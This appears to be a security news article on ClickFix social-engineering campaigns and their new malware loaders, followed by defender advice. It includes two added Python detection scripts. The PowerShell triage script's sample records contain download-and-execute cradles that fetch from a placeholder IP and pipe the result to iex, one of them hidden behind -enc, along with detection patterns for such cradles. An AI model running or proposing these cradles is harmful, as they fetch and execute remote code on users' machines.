Cybersecurity & Privacy

ClickFix Campaigns Add New Loaders and Fake Updates to Spread Malware

By Mag-Info Tech editorial · 2026-06-17

What the ClickFix campaigns are doing now

ClickFix is a long-running social-engineering operation that tricks users into running PowerShell commands under the guise of “fixing” a problem. Recent reports show that attackers have expanded the toolkit to include three new loaders—BabaDeda Loader, Lorem Ipsum Loader, and Potemkin—each designed to slip past defenses and install additional malware. Independent research groups have documented these loaders in separate campaigns, indicating that the ClickFix ecosystem is actively maintained and diversified.

The campaigns continue to rely on the same initial deception: a convincing prompt (email, pop-up, or web page) claims a system update or security patch is required. When the user runs the supplied PowerShell command, the loader is downloaded and executed. From there, the loader profiles the host, checks for security products, and avoids systems in Russia or Belarus before retrieving and injecting a final payload into a trusted Windows process such as svchost.exe. This staged approach keeps the malicious activity hidden from many automated scanners and human analysts alike.

How BabaDeda Loader has evolved since 2021

BabaDeda Loader first appeared in late 2021 as part of a crypter service that targeted cryptocurrency and Web3 users. At the time, it hid malicious payloads inside legitimate-looking installer packages. The loader has since matured into a more capable framework that preserves the original “code genome” while adding stealth, evasion, and payload flexibility. Instead of a single static payload, the loader now supports multiple techniques—hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage—to deliver information stealers and remote-access trojans (RATs).

In April 2026, researchers observed BabaDeda Loader hitting education and financial organizations. The loader profiles the host machine, avoids systems in specific geographies, and performs checks against common security products before retrieving the main payload. Once executed, it can inject the payload into a trusted Windows process, making detection harder for traditional antivirus and endpoint protection platforms. The payload itself is often a .NET backdoor and information stealer that can harvest sensitive data and open an encrypted channel to a command-and-control server, giving attackers persistent access and the ability to exfiltrate data over time.

New loader families in the ClickFix ecosystem

Alongside BabaDeda, two other loaders have surfaced in ClickFix campaigns: Lorem Ipsum Loader and Potemkin. While detailed technical write-ups are still emerging, the pattern mirrors BabaDeda’s approach—social-engineering delivery followed by a lightweight loader that fetches and executes a secondary payload. These loaders are likely designed to diversify the attackers’ toolkit, making it harder for defenders to build a single, unified detection signature.

Early indicators suggest that Lorem Ipsum Loader and Potemkin also employ staged loading techniques, where the visible application appears legitimate while the malicious payload remains hidden inside externally stored containers. The payload is decoded only moments before execution, minimizing forensic visibility and complicating automated analysis. This design reduces opportunities for traditional security tools to identify malicious activity before the payload is already running in memory or injected into a trusted process.

The infection chain in detail

The typical ClickFix infection chain starts with a prompt telling the user that something needs fixing: a missing driver, an expired certificate, or a required software update. The prompt supplies a PowerShell command and instructs the user to run it; that command downloads and runs the loader. The loader then performs host reconnaissance, checks for installed security products, and exits on hosts in excluded geographies. If the system passes these checks, the loader retrieves the main payload from an external source, sometimes a file named List.Control.dat or similar, and injects it into a legitimate Windows process.
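As an added example (not code from the article or from the research it summarizes), the following Python script triages PowerShell process-creation records for the cradle shape described above: a hidden window, an execution-policy bypass, a download primitive, and in-memory execution. It also decodes -EncodedCommand arguments (base64 of the UTF-16LE script) before scanning, so wrapping the cradle in -enc does not hide it. The records, their field names, the indicator weights, and the 203.0.113.10 URLs are constructed assumptions for illustration.

```python
"""Triage PowerShell process-creation records for ClickFix-style cradles.

Added example for this article; not code from the article or from any
research it summarises. Records are constructed in the shape of a SIEM
export of Sysmon Event ID 1 / Security 4688 (field names assumed), and
the 203.0.113.10 URLs are documentation-range placeholders.
"""
import base64
import binascii
import re
from typing import Optional

# -EncodedCommand and its short forms take base64 of the UTF-16LE script.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicator -> (pattern, weight). Weights are this example's own choice.
INDICATORS = {
    "hidden_window": (re.compile(r"-(?:w|win|window|windowstyle)\s+hidden\b", re.I), 2),
    "policy_bypass": (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I), 1),
    "no_profile": (re.compile(r"-(?:nop|noprofile)\b", re.I), 1),
    "encoded_command": (ENCODED_ARG, 2),
    "download_cradle": (re.compile(
        r"(?:\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|start-bitstransfer)", re.I), 3),
    "in_memory_exec": (re.compile(r"(?:\biex\b|invoke-expression)", re.I), 3),
}
SUSPECT_THRESHOLD = 6  # a download primitive plus in-memory execution crosses it


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if it is absent
    or not valid base64 / UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(record: dict) -> dict:
    """Score one record. The decoded payload, if any, is scanned together
    with the raw command line; each indicator counts once."""
    cmdline = record["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, (pat, _) in INDICATORS.items() if pat.search(text)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {
        "image": record["Image"],
        "parent": record["ParentImage"],
        "indicators": hits,
        "decoded_command": decoded,
        "score": score,
        "verdict": "clickfix_suspect" if score >= SUSPECT_THRESHOLD else "low",
    }


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: one benign scheduled script, one plaintext cradle,
# one cradle hidden behind -enc. Not real telemetry.
SAMPLE_COMMAND = "$c=New-Object Net.WebClient;$c.DownloadString('http://203.0.113.10/update')|iex"
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_RECORDS = [
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS_IMAGE,
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
     "CommandLine": "powershell -w hidden -ep bypass -nop -c "
                    "\"iex (iwr 'http://203.0.113.10/fix.ps1' -UseBasicParsing)\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
     "CommandLine": "powershell -nop -w hidden -enc " + encode_command(SAMPLE_COMMAND)},
]


def triage_all(records=SAMPLE_RECORDS) -> list:
    return [triage(r) for r in records]


if __name__ == "__main__":
    for r in triage_all():
        print(f'{r["verdict"]:16} score={r["score"]:2} {r["indicators"]}')
```

The benign backup script scores 1 (only -NoProfile) and stays "low"; both cradles cross the threshold, and the encoded one is reported with its decoded script so an analyst sees the download target without running anything. Tune the weights to your own baseline: a fleet that legitimately runs hidden, encoded PowerShell from management tooling will need the parent image or the signing of the script folded into the score.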

One documented variation uses a ZIP archive that employs DLL side-loading to launch DanaBot and SectopRAT (also known as ArechClient). A key feature in these attacks is the “Storage Crypter,” a staged loader component that reads payload material from externally stored files rather than embedding it in the executable or DLL. This separation makes it harder for disk-based scanners to detect the threat before execution: the executable and the side-loaded DLL on disk carry little of the malicious logic, and the payload is reconstructed in memory from the container file only at runtime.

Why these loaders are harder to detect

Traditional antivirus engines rely on signatures, heuristics, or behavioral rules that look for known malicious files or sequences. The new ClickFix loaders are built to sidestep these mechanisms: they keep as little of the malicious logic on disk as possible, execute in memory, and inject into trusted Windows processes. External payload storage and staged decryption shrink the window during which the payload is visible to security tools. Even behavioral analysis can be evaded, because a loader that exits as soon as it detects a security product, or finds the host's region on its exclusion list, never shows a sandbox its second stage.

Another complicating factor is the diversity of loaders. With BabaDeda, Lorem Ipsum, and Potemkin in circulation, attackers can rotate loaders to stay ahead of detection updates. Each loader may implement slightly different evasion techniques, forcing defenders to maintain multiple detection rules and behavioral models. This rotation also helps the campaigns persist even when one loader family is widely blocked, because the underlying social-engineering lure (the “ClickFix” prompt) remains effective.

Who is being targeted and why

Recent campaigns involving BabaDeda Loader have focused on education and financial organizations. Education institutions often have large, heterogeneous user bases and limited IT resources, making them attractive targets for credential harvesting and network reconnaissance. Financial organizations hold sensitive customer data and transaction histories, which can be monetized directly or used for further intrusions. The attackers’ ability to profile hosts and avoid certain regions suggests they are carefully selecting targets based on operational security and potential return on investment.

Beyond these sectors, the broader ClickFix ecosystem is likely opportunistic. Any user who clicks a “fix” prompt is a potential victim. The campaigns do not appear to be highly targeted at this stage; instead, they rely on volume and social engineering to achieve a foothold. Once inside, attackers can move laterally, escalate privileges, and deploy additional malware tailored to the compromised environment.

What defenders can do right now

Organizations should review email and web filtering rules for lures that tell users to run an “update” or “fix” command, since that instruction is the delivery vehicle. PowerShell script block and module logging give responders a record of what was actually executed, constrained language mode limits what a pasted script can do, and application control (AppLocker or Windows Defender Application Control) can stop unsigned or untrusted executables and DLLs from running at all. Network monitoring for unexpected outbound connections from user workstations, including to destinations already listed as command-and-control infrastructure, is also critical, especially after a suspected compromise.

Endpoint detection and response (EDR) tools that analyze process injection, memory anomalies, and lateral movement can catch the later stages of these attacks. Because the loaders rely on DLL side-loading and in-memory execution, memory-forensics capabilities are particularly valuable. Security teams should also review their allow lists and block lists for PowerShell, certutil, and other living-off-the-land binaries that attackers commonly abuse. Regular user awareness training remains essential to reduce the chance that someone will click a fake update prompt in the first place.
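To show what catching the later stages looks like in practice, both for the ZIP side-loading variation described earlier and for the EDR telemetry this paragraph recommends, here is an added example that is not code from the article or from any vendor it cites. It correlates Sysmon Event ID 7 (image load) and Event ID 8 (remote thread creation) records into a chain: a signed binary in a user-writable directory loads an unsigned DLL carrying a system-DLL name from beside itself, then starts a thread inside a trusted host such as svchost.exe. The events, paths, the DLL name list, the trusted-host list, and the correlation window are constructed assumptions.

```python
"""Correlate Sysmon image-load and remote-thread events into a
side-load -> injection chain.

Added example for this article, not code from the article or any vendor
it cites. Events are constructed in the shape of Sysmon Event ID 7
(ImageLoaded) and Event ID 8 (CreateRemoteThread) records; paths, lists
and the time window are assumptions for illustration.
"""
from datetime import datetime, timedelta
import ntpath

# DLL names commonly planted beside a signed binary for side-loading
# (illustrative, not exhaustive).
SIDELOAD_DLL_NAMES = {"version.dll", "dbghelp.dll", "wininet.dll", "cryptbase.dll",
                      "userenv.dll", "profapi.dll", "msimg32.dll"}
# Trusted hosts a loader injects into; matched on basename only.
INJECTION_TARGETS = {"svchost.exe", "explorer.exe", "runtimebroker.exe", "dllhost.exe"}
WINDOWS_DIR = r"c:\windows"
CHAIN_WINDOW = timedelta(minutes=10)


def _is_windows_path(path: str) -> bool:
    return path.lower().startswith(WINDOWS_DIR + "\\")


def _ts(event: dict) -> datetime:
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def is_sideload(event: dict) -> bool:
    """Event 7: an unsigned DLL with a system-DLL name, loaded from the
    loader's own non-Windows directory instead of from System32."""
    if event["EventID"] != 7 or event.get("Signed", "false").lower() == "true":
        return False
    exe, dll = event["Image"], event["ImageLoaded"]
    same_dir = ntpath.dirname(exe).lower() == ntpath.dirname(dll).lower()
    return (same_dir and not _is_windows_path(dll)
            and ntpath.basename(dll).lower() in SIDELOAD_DLL_NAMES)


def is_injection(event: dict) -> bool:
    """Event 8: a binary outside C:\\Windows starts a thread in a trusted host."""
    if event["EventID"] != 8:
        return False
    src, dst = event["SourceImage"], event["TargetImage"]
    return (ntpath.basename(dst).lower() in INJECTION_TARGETS
            and not _is_windows_path(src))


def find_chains(events: list) -> list:
    """Pair each side-load with a later injection by the same image inside
    CHAIN_WINDOW. Returns one dict per chain."""
    loads = [e for e in events if is_sideload(e)]
    injections = [e for e in events if is_injection(e)]
    chains = []
    for ld in loads:
        for inj in injections:
            same_image = ld["Image"].lower() == inj["SourceImage"].lower()
            delta = _ts(inj) - _ts(ld)
            if same_image and timedelta(0) <= delta <= CHAIN_WINDOW:
                chains.append({"loader": ld["Image"], "dll": ld["ImageLoaded"],
                               "target": inj["TargetImage"],
                               "seconds_between": delta.total_seconds()})
    return chains


LOADER = r"C:\Users\alice\AppData\Local\Temp\Update\updater.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    # Normal: svchost loads the real, signed version.dll from System32.
    {"EventID": 7, "UtcTime": "2026-06-01 09:00:00.000",
     "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    # Side-load: a signed updater.exe extracted from a ZIP loads an
    # unsigned version.dll sitting next to it.
    {"EventID": 7, "UtcTime": "2026-06-01 09:01:10.000", "Image": LOADER,
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\Update\version.dll",
     "Signed": "false"},
    # Filtered: source under C:\Windows, so not treated as injection here.
    {"EventID": 8, "UtcTime": "2026-06-01 09:01:30.000",
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
    # Injection: the same updater.exe starts a thread inside svchost.exe.
    {"EventID": 8, "UtcTime": "2026-06-01 09:02:05.000", "SourceImage": LOADER,
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for chain in find_chains(SAMPLE_EVENTS):
        print(chain)
```

Neither event alone is conclusive: unsigned DLLs next to installers are common, and some Windows components legitimately create remote threads. The pairing, an unsigned side-loaded DLL followed within minutes by the same image injecting into svchost.exe, is the signal worth paging on, and it is exactly the sequence the Storage Crypter design relies on staying unobserved.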

What to watch next

The diversification of loaders suggests that the ClickFix campaigns are still evolving. Expect additional loader families to appear, each with new evasion techniques. Researchers have already noted the use of “Storage Crypter” and external payload storage; similar innovations could emerge around encrypted payload delivery or abuse of legitimate cloud storage services. Defenders should prepare for loaders that can adapt to new security controls, such as AI-driven endpoint protection or stricter application control policies.

Another area to monitor is the payload ecosystem. Once a loader establishes a foothold, attackers can install anything from information stealers to ransomware. The presence of DanaBot and SectopRAT in recent campaigns indicates that banking trojans and RATs remain in active use. Organizations should ensure their incident-response playbooks cover data theft, lateral movement, and ransomware scenarios, because a single loader infection can escalate quickly if left unchecked.

Practical steps for individuals and small teams

Individual users and small teams without dedicated security staff can still reduce their risk. Disable or restrict PowerShell if it is not required for daily tasks, and enable logging when it is needed. Use a reputable ad-blocker and script-blocker in browsers to reduce exposure to fake update pop-ups. Keep operating systems and key applications updated through official channels, not third-party prompts. For small businesses, consider a lightweight EDR solution or a managed detection-and-response service to monitor for unusual activity.

If a system becomes unresponsive or shows signs of unusual network traffic, disconnect it from the network immediately and scan with multiple antivirus engines. Collect logs and process trees before rebooting, as this evidence can help responders trace the infection chain. Finally, treat any unsolicited “fix” prompt as suspicious by default—verify through official support channels rather than clicking through.

Bottom line

ClickFix campaigns have evolved from simple fake-update lures to a sophisticated ecosystem of loaders designed to evade detection and deliver a range of malicious payloads. The addition of BabaDeda, Lorem Ipsum, and Potemkin loaders shows that attackers are investing in stealth, flexibility, and operational security. Defenders must adapt by tightening application control, improving PowerShell hygiene, and deploying memory- and behavior-focused monitoring. For users, skepticism toward unsolicited “fix” prompts remains the first and most effective line of defense.
